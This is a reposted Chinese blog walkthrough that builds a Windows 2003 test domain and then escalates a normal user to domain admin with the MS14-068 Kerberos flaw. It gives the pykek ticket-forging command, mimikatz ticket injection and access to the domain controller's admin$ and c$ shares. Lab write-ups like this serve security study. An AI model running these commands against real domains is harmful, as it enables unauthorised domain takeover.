博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
从域环境搭建到 MS14-068 提升为域权限
阅读量:5220 次
发布时间:2019-06-14

本文共 603 字,大约阅读时间需要 2 分钟。

搭建域环境

  • 修改win2003(域控)计算机名为"DCwin03",修改ip

 01

 02

  • 配置成 DNS 服务器,"开始--控制面板--添加或删除程序--添加/删除 windows 组件"

 03

 04

  • 运行:"dcpromo","新域或域控制器--在新林中的域",下一步,设置还原密码

 05

 06

  • 运行"dsa.msc" 添加一个普通域用户

 07

  • 添加 xp 到域中

 08

 09

通过 MS14-068 获取域管理员权限

  • 域管理员:DCwin03 域名:demo.com 普通域用户:hx
  • 登陆普通域用户 hx,cmd 中输入"whoami/user"获取sid

 x1

 x2

  • 退出域用户 hx,登陆本地用户 123

 x3

C:\pykek-master>python ms14-068.py -u hx@demo.com -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com

 x4

C:\pykek-master>mimikatz.exe "kerberos::ptc TGT_hx@demo.com.ccache" exitnet use \\DCwin03\admin$dir \\DCwin03\c$

exp:

转载于:https://www.cnblogs.com/trojan-z/p/6863315.html

你可能感兴趣的文章
NoSQL数据库常见分类
查看>>
JS小工具_字符串转16进制数组_02
查看>>
信息安全系统设计基础实验四—20135214万子惠20135227黄晓妍
查看>>
一题多解 之 Bat
查看>>
Java 内部类
查看>>
PHP程序员的技术成长规划
查看>>
测试一个对象是否是类字符串
查看>>
{面试题7: 使用两个队列实现一个栈}
查看>>
用JSONP方式跨域请求
查看>>
[Luogu 4135] 作诗
查看>>
[转]SQL中 OVER(PARTITION BY) 取上一条,下一条等
查看>>
前端开发就从认识浏览器开始 - 浏览器处理请求的过程
查看>>
【练习】使用事务和锁定语句
查看>>
centos7升级firefox的flash插件
查看>>
jmeter系列二(jmeter engine相关)
查看>>
前端页面设计问题小计
查看>>
一份超全超详细的 ADB 用法大全
查看>>
Spring定时任务(@Scheduled)
查看>>
WebView 调试
查看>>
IB使用
查看>>